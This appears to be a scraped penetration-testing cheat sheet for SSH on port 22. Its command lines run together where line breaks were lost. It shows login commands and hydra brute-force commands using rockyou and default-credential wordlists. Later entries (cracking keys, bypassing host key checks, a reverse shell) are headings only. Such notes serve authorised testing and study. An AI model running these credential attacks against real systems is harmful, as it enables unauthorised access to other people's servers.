Secure Shell (SSH)
Port: 22
1) Authenticate via SSH
ssh USER@IP2) Authenticate using private key
chmod 600 id_rsassh USER@IP -i id_rsa3) Brute force credentials
hydra -l USER -P /usr/share/wordlists/rockyou.txt IP -t 4 sshhydra -L USERLIST -p password IP -t 4 sshhydra -f -V -C /usr/share/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt IP ssh4) Convert PuTTY key to OpenSSH format
5) Crack SSH Private keys
6) Run commands upon connection
7) Bypass Host Key Checking
8) Force a different cipher
9) Force an older SSH version
10) Reverse shell with weak cryptographic algorithms
Last updated